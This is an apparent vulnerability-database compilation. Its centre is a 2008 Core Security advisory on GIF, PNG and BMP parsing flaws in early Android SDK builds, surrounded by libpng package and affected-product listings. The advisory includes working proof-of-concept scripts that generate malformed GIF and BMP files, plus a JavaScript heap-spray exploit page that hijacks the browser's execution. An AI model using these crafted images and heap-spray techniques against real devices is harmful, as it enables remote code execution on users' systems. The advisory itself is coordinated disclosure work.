Size/MD5: 68246 c81ffc4cd0359a1ce1e73eb99d8608f6 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_i386.deb Size/MD5: 187234 09dcea1e3394a6d25565b23774d805db http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_i386.deb Size/MD5: 171520 ac3fb45b36ec32b1bac4734eef162c49 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_powerpc.udeb Size/MD5: 70652 147c89e36570990d5e084fc3a8933ed2 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb Size/MD5: 189548 00b81b16632e789ab20bab04dbcd586c http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb Size/MD5: 179128 61c51aafc326420b202c0f2ce6d5abfd sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_sparc.udeb Size/MD5: 66396 faff3d313cdc64f273eda1a5d01c2e0a http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_sparc.deb Size/MD5: 185312 249165d75936ab8cfc2fa1aef68a5ee6 http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_sparc.deb Size/MD5: 173800 a40164cd4995c6ed795219157e6d598e . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs Multiple vulnerabilities in Google's Android SDK *Advisory Information* Title: Multiple vulnerabilities in Google's Android SDK Advisory ID: CORE-2008-0124 Advisory URL: http://www.coresecurity.com/?action=item&id=2148 Date published: 2008-03-04 Date of last update: 2008-03-04 Vendors contacted: Google Release mode: Coordinated release *Vulnerability Information* Class: Heap overflow, integer overflow Remotely Exploitable: No Locally Exploitable: No Bugtraq ID: 28006, 28005 CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269 *Vulnerability Description* Android is project promoted primarily by Google through the Open Handset Alliance aimed at providing a complete set of software for mobile devices: an operating system, middleware and key mobile applications [1]. Although the project is currently in a development phase and has not made an official release yet, several vendors of mobile chips have unveiled prototype phones built using development releases of the platform at the Mobile World Congress [2]. Development using the Android platform gained activity early in 2008 as a result of Google's launch of the Android Development Challenge which includes $10 million USD in awards [3] for which a Software Development Kit (SDK) was made available in November 2007. The Android Software Development Kit includes a fully functional operating system, a set of core libraries, application development frameworks, a virtual machine for executing application and a phone emulator based on the QEMU emulator [4]. Public reports as of February 27th, 2008 state that the Android SDK has been downloaded 750,000 times since November 2007 [5]. Several vulnerabilities have been found in Android's core libraries for processing graphic content in some of the most used image formats (PNG, GIF an BMP). While some of these vulnerabilities stem from the use of outdated and vulnerable open source image processing libraries other were introduced by native Android code that use them or that implements new functionality. Exploitation of these vulnerabilities to yield complete control of a phone running the Android platform has been proved possible using the emulator included in the SDK, which emulates phone running the Android platform on an ARM microprocessor. This advisory contains technical descriptions of these security bugs, including a proof of concept exploit to run arbitrary code, proving the possibility of running code on Android stack (over an ARM architecture) via a binary exploit. *Vulnerable Packages* . Android SDK m3-rc37a and earlier are vulnerable several bugs in components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of this advisory). Android SDK m5-rc14 is vulnerable to a security bug in the component that process BMP images (bug #3). *Non-vulnerable Packages* . Android SDK m5-rc15 *Vendor Information, Solutions and Workarounds* Vendor statement: "The current version of the Android SDK is an early look release to the open source community, provided so that developers can begin working with the platform to inform and shape our development of Android toward production readiness. The Open Handset Alliance welcomes input from the security community throughout this process. There will be many changes and updates to the platform before Android is ready for end users, including a full security review." *Credits* These vulnerabilities were discovered by Alfredo Ortega from Core Security Technologies, leading his Bugweek 2007 team called "Pampa Grande". It was researched in depth by Alfredo Ortega. *Technical Description / Proof of Concept Code* Android is a software stack for mobile devices that includes an operating system, middleware and key applications. Android relies on Linux version 2.6 for core system services such as security, memory management, process management, network stack, and driver model. The kernel also acts as an abstraction layer between the hardware and the rest of the software stack. The WebKit application framework is included to facilitate development of web client application functionality. The framework in turn uses different third-party open source libraries to implement processing of several image formats. Android includes a web browser based on the Webkit framework that contains multiple binary vulnerabilities when processing .GIF, .PNG and .BMP image files, allowing malicious client-side attacks on the web browser. A client-side attack could be launched from a malicious web site, hosting specially crafted content, with the possibility of executing arbitrary code on the victim's Android system. These client-side binary vulnerabilities were discovered using the Android SDK that includes an ARM architecture emulator. Binary vulnerabilities are the most common security bugs in computer software. Basic bibliography on these vulnerabilities includes a recently updated handbook about security holes that also describes current state-of-the-start exploitation techniques for different hardware platforms and operating systems [6]. The vulnerabilities discovered are summarized below grouped by the type of image file format that is parsed by the vulnerable component. #1 - GIF image parsing heap overflow The Graphics Interchange Format (GIF) is image format dating at least from 1989 [7]. It was popularized because GIF images can be compressed using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the memory footprint and bandwidth required for transmission and storage. A memory corruption condition happens within the GIF processing library of the WebKit framework when the function 'GIFImageDecoder::onDecode()' allocates a heap buffer based on the _Logical Screen Width and Height_ filed of the GIF header (offsets 6 and 8) and then the resulting buffer is filled in with an amount of data bytes that is calculated based on the real Width and Height of the GIF image. There is a similar (if not the same) bug in the function 'GIFImageDecoder::haveDecodedRow() 'in the open-source version included by Android in 'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp' inside 'webkit-522-android-m3-rc20.tar.gz' available at [8]. Detailed analysis: When the process 'com.google.android.browser' must handle content with a GIF file it loads a dynamic library called 'libsgl.so' which contains the decoders for multiple image file formats. Decoding of the GIF image is performed correctly by the library giflib 4.0 (compiled inside 'libsgl.so'). However, the wrapper object 'GIFImageDecoder' miscalculates the total size of the image. First, the Logical Screen Size is read and stored in the following calling sequence (As giflib is an Open Source MIT-licenced library, the source was available for analysis): 'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and Height_ in a structure called 'GifFileType': /----------- Int DGifGetScreenDesc(GifFileType * GifFile) { ... /* Put the screen descriptor into the file: */ if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR || DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR) return GIF_ERROR; ... } - -----------/ We can see that the fields are stored in the first 2 words of the structure: /----------- typedef struct GifFileType { /* Screen dimensions. */ GifWord SWidth, SHeight, ... } - -----------/ In the disassembly of the GIFImageDecoder::onDecode() function provided below we can see how the DGifOpen() function is called and that the return value (A GifFileType struct) is stored on the $R5 ARM register: /----------- .text:0002F234 BL _DGifOpen .text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5 - -----------/ Then, the giflib function 'DGifSlurp()' is called and the Image size is correctly allocated using the Image Width and Height and not the Logical Screen Size: /----------- Int DGifSlurp(GifFileType * GifFile) { ... ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height; sp->RasterBits = (unsigned char *)malloc(ImageSize * sizeof(GifPixelType)); ... } - -----------/ Afterwards the _Logical Screen_ Width and Height are stored in the R9 and R11 registers: /----------- .text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight ! - -----------/ However the actual image may be much larger that these sizes that are incorrectly passed to a number of methods of the 'GIFImageDecoder': /----------- ImageDecoder::chooseFromOneChoice(): .text:0002F294 MOV R0, R8 .text:0002F298 MOV R1, #3 .text:0002F29C MOV R2, R9 .text:0002F2A0 MOV R3, R11 .text:0002F2A4 STR R12, [SP,#0x48+var_3C] .text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice; ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int ,int) Bitmap::setConfig(): .text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap .text:0002F2BC MOV R1, #3 .text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight ! .text:0002F2C4 MOV R3, R11 .text:0002F2C8 STR R10, [SP,#0x48+var_48] .text:0002F2CC BL _Bitmap9setConfig ; Bitmap::setConfig(SkBitmap::Config,uint,uint,uint) - -----------/ This function stores the SWidth and SHeight inside the Bitmap object as shown in the following code snippet: /----------- .text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7 .text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8 .text:00035C40 MOV R4, R0 ; $R4 = *Bitmap - -----------/ And later: /----------- .text:00035C58 BL _Bitmap15ComputeRowBytes ; SkBitmap::ComputeRowBytes(SkBitmap::Config,uint) .text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes .text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth .text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight .text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes - -----------/ The following python script generates a GIF file that causes the overflow. It requires the Python Imaging Library. Once generated the GIF file, it must be opened in the Android browser to trigger the overflow: /----------- ##Android Heap Overflow ##Ortega Alfredo _ Core Security Exploit Writers Team ##tested against Android SDK m3-rc37a import Image import struct #Creates a _good_ gif image imagename='overflow.gif' str = '\x00\x00\x00\x00'*30000 im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1) im.save(imagename,'GIF') #Shrink the Logical screen dimension SWidth=1 SHeight=1 img = open(imagename,'rb').read() img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:] #Save the _bad_ gif image q=open(imagename,'wb=""') q.write(img) q.close() - -----------/ This security bug affects Android SDK m3-rc37a and earlier versions. Version m5-rc14 of the Android SDK includes a fix and is not vulnerable to this bug. #2 - PNG image parsing, multiple vulnerabilities: The Portable Network Graphics (PNG) is a bitmapped image format that employs lossless data compression [9]. PNG was created to improve upon and replace the GIF format as an image file format that does not require a patent license. The version inside libsgl.so distributed with Android SDK m3-rc37a and earlier versions include the string '"libpng version 1.2.8 - December 3, 2004"'. Source code inspection of the file '\WebKitLib\WebKit\WebCore\platform\image-decoders\png\png.c' included in the 'webkit-522-android-m3-rc20.tar.gz ' release of the Android project reveals that '"libpng version 1.2.7 - September 12, 2004"' has been used in this release. This old version of libpng makes Android SDK m3-rc37a and earlier versions vulnerable to the following known issues: ' CVE-2006-5793, CVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269 '. Android version m5-rc14 has been updated to include libpng 1.2.24 and is likely not vulnerable. #3 - BMP image processing, negative offset integer overflow: The BMP file format, sometimes called bitmap or DIB file format (for device-independent bitmap), is an image file format used to store bitmap digital images, especially on Microsoft Windows and OS/2 operating systems [10]. The integer overflow is caused when a Windows Bitmap file (.BMP) header is parsed in the method 'BMP::readFromStream(Stream *, ImageDecoder::Mode)' inside the 'libsgl.so' library. When the value of the 'offset' field of the BMP file header is negative and the Bitmap Information section (DIB header) specifies an image of 8 bits per pixel (8 bpp) the parser will try to allocate a palette, and will use the negative offset to calculate the size of the palette. The following code initializes the palette with the color white ('0x00ffffff') but with a carefully chosen negative offset it can be made to overwrite any address of the process with that value. Because the BMP decoder source wasn't released, a disassembly of the binary included by Android is provided below: /----------- .text:0002EE38 MOV LR, R7 ; R7 is the negative offset .text:0002EE3C MOV R12, R7,LSL#2 .text:0002EE40 .text:0002EE40 loc_2EE40 .text:0002EE40 LDR R3, [R10,#0x10] .text:0002EE44 ADD LR, LR, #1 .text:0002EE48 MOVL R2, 0xFFFFFFFF .text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the same bug) but ranges 0x10000-0x20000 .text:0002EE50 MOV R0, #0 .text:0002EE54 CMP LR, R9 .text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1) .text:0002EE5C STRB R2, [R1,#2] .text:0002EE60 STRB R0, [R1,#3] .text:0002EE64 STRB R2, [R1,#1] .text:0002EE68 ADD R12, R12, #4 .text:0002EE6C BNE loc_2EE40 - -----------/ Now, if let's take a look at the memory map of the Android browser: /----------- # ps ps USER PID PPID VSIZE RSS WCHAN PC NAME root 1 0 248 64 c0084edc 0000ae2c S /init root 2 0 0 0 c0049168 00000000 S kthreadd ... root 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb app_0 1574 535 83564 12832 ffffffff afe0c79c S com.google.android.browser root 1600 587 840 324 00000000 afe0bfbc R ps # cat /proc/1574/maps cat /proc/1574/maps 00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process 0000a000-00c73000 rwxp 0000a000 00:00 0 [heap] 08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted) ... # - -----------/ We can see that the heap is located in the range '0000a000-00c73000' and it is executable. Overwriting this area will allow to redirect execution flow if there is a virtual table stored in the heap. Later on the same method we can see that a call to the "Stream" Object VT is made: /----------- .text:0002EB64 LDR R12, [R8] # R8 is the "this" pointer of the Stream Object .text:0002EB68 MOV R0, R8 .text:0002EB6C MOV LR, PC .text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10 - -----------/ Because the "Stream" Object (R8) is stored on the heap and we can fill the heap with the white color ' 0x00ffffff' we can load the Program Counter with the value at '0xffffff+0x10'. The following python script will generate a BMP to accomplish that: /----------- # This script generates a Bitmap file that makes the Android browser jump to the address at 0xffffff+0x10 # Must be loaded inside a HTML file with a tag like this: &lt;IMG src=badbmp.bmp&gt; # Alfredo Ortega - Core Security import struct offset = 0xffef0000 width = 0x0bffff height=8 bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00" bmp+=struct.pack("<I",offset) bmp+="\x28\x00\x00\x00" bmp+=struct.pack("<I",width) bmp+=struct.pack("<I",height) bmp+="\x03\x00\x08\x00\x00\x00" bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff" bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41" bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" open("badbmp.bmp","wb").write(bmp) - -----------/ Opening the BMP file generated with this script inside a HTML page will cause (sometimes, as it is dependent on an uninitialized variable) the following output of the gdb debugger: /----------- (gdb) attach 1574 attach 1574 Attaching to program: /system/bin/app_process, process 1574 ... 0xafe0d204 in __futex_wait () from /system/lib/libc.so (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? () (gdb) - -----------/ Here the browser process has jumped to the '0x00000000' address because that is the value at 0x00ffffff+0x10. We can change this value using common JavaScript heap-filling techniques. The complete exploit page follows: /----------- <HTML> <HEAD> </HEAD> <BODY> <script type="text/javascript"> // Fill 0x200000 - 0xa00000 with Breakpoints var nop = unescape("%u0001%uef9f"); while (nop.length <= 0x100000/2) nop += nop; var i = 0; for (i = 0;i<5;i++) document.write(nop) // Fill 0xa00000 - 0x1100000 with address 0x00400040 var nop = unescape("%u4000%u4000"); while (nop.length <= 0x100000/2) nop += nop; var i = 0; for (i = 0;i<2;i++) document.write(nop) </script> <IMG src=badbmp.bmp> </BODY> </HTML> - -----------/ Because the exploit needs to fill over 16 MB of heap memory to reach the address '0xffffff' it is very slow and the default memory configuration of Android will often abort the process before reaching the desired point. To overcome this limitation for demonstration purposes one can launch the emulator with this parameters: 'emulator -qemu -m 192' That will launch the Android emulator with 192 megabytes of memory, plenty for the exploit to work. *Report Timeline* . 2008-01-30: Vendor is notified that possibly exploitable vulnerabilities where discovered and that an advisory draft is available. 2008-01-30: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft encrypted, including PoC code to generate malformed GIF images. 2008-01-31: Vendor acknowledges the draft. 2008-02-02: Vendor notifies that the software is an early release for the open source community, but agree they can fix the problem on the estimated date (2008-02-25). 2008-02-04: Core notifies the vendor that Android is using a vulnerable PNG processing library. 2008-02-08: Vendor acknowledges, invites Core to send any new findings and asks if all findings will be included in the advisory. 2008-02-12: Core responds to vendor that all security issues found will be included in the advisory, the date is subject to coordination. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core receives no notification. 2008-02-13: Core sends the vendor more malformed images, including GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20: Core sends to the vendor a new version of the advisory, including a BMP PoC that runs arbitrary ARM code and informs the vendor that we noticed that the recent m5-rc14 release fixed the GIF and PNG bugs. Publication of CORE-2008-0124 has been re-=scheduled for February 27th. 2008. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been released and provides an official statement to the "Vendor Section" of the advisory. A final review of the advisory is requested before its release. The vendor indicates that the Android SDK is still in development and stabilization won't happen until it gets closer to Alpha. Changes to fix the BMP issue are coming soon, priorities are given to issues listed in the public issue tracking system at http://code.google.com/p/android/issues . 2008-02-26: Core indicates that publication of CORE-2008-0124 has been moved to March 3rd 2008, asks if an estimated date for the BMP fix is available and if Core should file the reported and any future bugs in the public issue tracking page. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to the vendor as requested. Core requests for any additional comments or statements to be provided by noon March 3rd, 2008 (UTC-5) . 2008-03-01: Vendor requests publication to be delayed one day in order to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP vulnerability. Vendor indicates that Android applications run with the credentials of an unprivileged user which decreases the severity of the issues found . 2008-03-04: Further research by Alfredo Ortega reveals that although the vendor statement is correct current versions of Android SDK ship with a passwordless root account. Unprivileged users with shell access can simply use the 'su' program to gain privileges . 2008-03-04: Advisory CORE-2008-0124 is published. *References* [1] Android Overview - Open Handset Alliance - http://www.openhandsetalliance.com/android_overview.html [2] "Android Comes to Life in Barcelona" - The Washington Post , February 11th, 2008 - http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html [3] Android Developer Challenge - http://code.google.com/android/adc.html [4] "Test Center Preview: Inside Google's Mobile future" - Inforworld, Feb. 27th 2008 - http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html [5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th, 2008 http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html [6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Chris Anley , John Heasman , Felix Linder and Gerardo Richarte. Wiley; 2nd edition (August 20, 2007) - http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html [7] Graphics Interchange Format version 89a - http://www.w3.org/Graphics/GIF/spec-gif89a.txt [8] Android downloads page http://code.google.com/p/android/downloads/list [9] Portable Network Graphics (PNG) specification - http://www.w3.org/TR/PNG/ [10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs/. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. *Disclaimer* The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. *GPG/PGP Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I teV3ahcSAUFEtsaRCeXVuN8= =u35s -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ____________________________________________________________________________ Publisher Name: OpenPKG GmbH Publisher Home: http://openpkg.com/ Advisory Id (public): OpenPKG-SA-2007.013 Advisory Type: OpenPKG Security Advisory (SA) Advisory Directory: http://openpkg.com/go/OpenPKG-SA Advisory Document: http://openpkg.com/go/OpenPKG-SA-2007.013 Advisory Published: 2007-05-17 22:31 UTC Issue Id (internal): OpenPKG-SI-20070517.02 Issue First Created: 2007-05-17 Issue Last Modified: 2007-05-17 Issue Revision: 03 ____________________________________________________________________________ Subject Name: png Subject Summary: Portable Network Graphics (PNG) Image Format Library Subject Home: http://www.libpng.org/pub/png/libpng.html Subject Versions: * <= 1.2.16 Vulnerability Id: CVE-2007-2445 Vulnerability Scope: global (not OpenPKG specific) Attack Feasibility: run-time Attack Vector: remote network Attack Impact: denial of service Description: As confirmed by the vendor, a Denial of Service (DoS) vulnerability exists in the PNG [0] image format library libpng [1]. The bug is a NULL-pointer-dereference vulnerability involving palette images with a malformed "tRNS" PNG chunk, i.e., one with a bad CRC value. This bug can, at a minimum, cause crashes in applications simply by displaying a malformed image. References: [0] http://www.libpng.org/pub/png/ [1] http://www.libpng.org/pub/png/libpng.html [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445 ____________________________________________________________________________ Primary Package Name: png Primary Package Home: http://openpkg.org/go/package/png Corrected Distribution: Corrected Branch: Corrected Package: OpenPKG Enterprise E1.0-SOLID ghostscript-8.54-E1.0.1 OpenPKG Enterprise E1.0-SOLID png-1.2.12-E1.0.2 OpenPKG Community CURRENT ghostscript-8.57-20070516 OpenPKG Community CURRENT png-1.2.18-20070516 ____________________________________________________________________________ For security reasons, this document was digitally signed with the OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34) which you can download from http://openpkg.com/openpkg.com.pgp or retrieve from the OpenPGP keyserver at hkp://pgp.openpkg.org/. Follow the instructions at http://openpkg.com/security/signatures/ for more details on how to verify the integrity of this document

Trust: 2.7

sources: NVD: CVE-2007-2445 // CERT/CC: VU#684664 // BID: 24000 // BID: 24023 // PACKETSTORM: 68410 // PACKETSTORM: 75976 // PACKETSTORM: 129524 // PACKETSTORM: 57151 // PACKETSTORM: 64260 // PACKETSTORM: 56849

AFFECTED PRODUCTS

vendor:png reference librarymodel:libpngscope:lteversion:1.0.15

Trust: 1.0

vendor:png reference librarymodel:libpngscope:lteversion:1.2.16

Trust: 1.0

vendor:debian gnu linuxmodel: - scope: - version: -

Trust: 0.8

vendor:gentoo linuxmodel: - scope: - version: -

Trust: 0.8

vendor:mandrivamodel: - scope: - version: -

Trust: 0.8

vendor:red hatmodel: - scope: - version: -

Trust: 0.8

vendor:suse linuxmodel: - scope: - version: -

Trust: 0.8

vendor:sun microsystemsmodel: - scope: - version: -

Trust: 0.8

vendor:ubuntumodel: - scope: - version: -

Trust: 0.8

vendor:libpngmodel: - scope: - version: -

Trust: 0.8

vendor:libpngmodel:libpngscope:eqversion:1.0.17

Trust: 0.6

vendor:libpngmodel:libpngscope:neversion:1.0.25

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.18

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.7

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.13

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.14

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.6

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.12

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.8

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.9

Trust: 0.6

vendor:libpngmodel:libpngscope:neversion:1.2.17

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.11

Trust: 0.6

vendor:gentoomodel:linuxscope: - version: -

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.16

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.5

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.10

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:0.90

Trust: 0.6

vendor:libpngmodel:libpngscope:eqversion:1.0.15

Trust: 0.6

vendor:linuxmodel:kernelscope: - version: -

Trust: 0.6

vendor:debianmodel:linux armelscope:eqversion:5.0

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2007.0

Trust: 0.3

vendor:libpngmodel:libpng3scope:eqversion:1.2.12

Trust: 0.3

vendor:redhatmodel:enterprise linux cluster-storage serverscope:eqversion:5

Trust: 0.3

vendor:debianmodel:linux hppascope:eqversion:5.0

Trust: 0.3

vendor:debianmodel:linux powerpcscope:eqversion:5.0

Trust: 0.3

vendor:mandrakesoftmodel:multi network firewallscope:eqversion:2.0

Trust: 0.3

vendor:redhatmodel:enterprise linux wsscope:eqversion:2.1

Trust: 0.3

vendor:redhatmodel:enterprise linux supplementary serverscope:eqversion:5

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop multi os clientscope:eqversion:5

Trust: 0.3

vendor:turbolinuxmodel:serverscope:eqversion:10.0x86

Trust: 0.3

vendor:libpngmodel:libpng3scope:eqversion:1.2.11

Trust: 0.3

vendor:rpathmodel:linuxscope:eqversion:1

Trust: 0.3

vendor:mandrakesoftmodel:corporate server x86 64scope:eqversion:4.0

Trust: 0.3

vendor:ubuntumodel:linux lts powerpcscope:eqversion:6.06

Trust: 0.3

vendor:avayamodel:ccsscope:eqversion:3.0

Trust: 0.3

vendor:googlemodel:android software development kit m3-rc37ascope: - version: -

Trust: 0.3

vendor:ubuntumodel:linux i386scope:eqversion:6.10

Trust: 0.3

vendor:turbolinuxmodel:personalscope: - version: -

Trust: 0.3

vendor:redhatmodel:enterprise linux esscope:eqversion:4

Trust: 0.3

vendor:redhatmodel:enterprise linux esscope:eqversion:3

Trust: 0.3

vendor:libpngmodel:libpng3scope:eqversion:1.2.1

Trust: 0.3

vendor:turbolinuxmodel:appliance server hosting editionscope:eqversion:1.0

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop versionscope:eqversion:4

Trust: 0.3

vendor:ubuntumodel:linux sparcscope:eqversion:7.04

Trust: 0.3

vendor:avayamodel:ccsscope:eqversion:3.1.1

Trust: 0.3

vendor:mandrivamodel:linux mandrake x86 64scope:eqversion:2007.1

Trust: 0.3

vendor:redhatmodel:advanced workstation for the itanium processorscope:eqversion:2.1

Trust: 0.3

vendor:turbolinuxmodel:fujiscope: - version: -

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop clientscope:eqversion:5

Trust: 0.3

vendor:ubuntumodel:linux powerpcscope:eqversion:7.04

Trust: 0.3

vendor:libpngmodel:libpng3scope:eqversion:1.2.10

Trust: 0.3

vendor:redhatmodel:enterprise linux ws ia64scope:eqversion:2.1

Trust: 0.3

vendor:foresightmodel:linux foresight linuxscope:eqversion:1.1

Trust: 0.3

vendor:debianmodel:linux sparcscope:eqversion:5.0

Trust: 0.3

vendor:ubuntumodel:linux lts i386scope:eqversion:6.06

Trust: 0.3

vendor:googlemodel:android software development kit m5-rc15scope:neversion: -

Trust: 0.3

vendor:avayamodel:messaging storage server mm3.0scope: - version: -

Trust: 0.3

vendor:avayamodel:messaging storage serverscope: - version: -

Trust: 0.3

vendor:debianmodel:linux amd64scope:eqversion:4.0

Trust: 0.3

vendor:avayamodel:messaging storage serverscope:eqversion:2.0

Trust: 0.3

vendor:ubuntumodel:linux amd64scope:eqversion:6.10

Trust: 0.3

vendor:ubuntumodel:linux sparcscope:eqversion:6.10

Trust: 0.3

vendor:irrlichtmodel:engine irrlicht enginescope:neversion:1.3.1

Trust: 0.3

vendor:sunmodel:solaris 8 sparcscope: - version: -

Trust: 0.3

vendor:linuxmodel:terminal server project linux terminal server projectscope:eqversion:4.2

Trust: 0.3

vendor:ubuntumodel:linux lts amd64scope:eqversion:6.06

Trust: 0.3

vendor:turbolinuxmodel:appliance serverscope:eqversion:2.0

Trust: 0.3

vendor:avayamodel:ccsscope:eqversion:2.0

Trust: 0.3

vendor:sunmodel:solarisscope:eqversion:9

Trust: 0.3

vendor:mandrivamodel:linux mandrakescope:eqversion:2007.1

Trust: 0.3

vendor:ubuntumodel:linux powerpcscope:eqversion:6.10

Trust: 0.3

vendor:debianmodel:linux alphascope:eqversion:4.0

Trust: 0.3

vendor:redhatmodel:enterprise linux esscope:eqversion:2.1

Trust: 0.3

vendor:openpkgmodel:e1.0-solidscope: - version: -

Trust: 0.3

vendor:debianmodel:linux ia-32scope:eqversion:4.0

Trust: 0.3

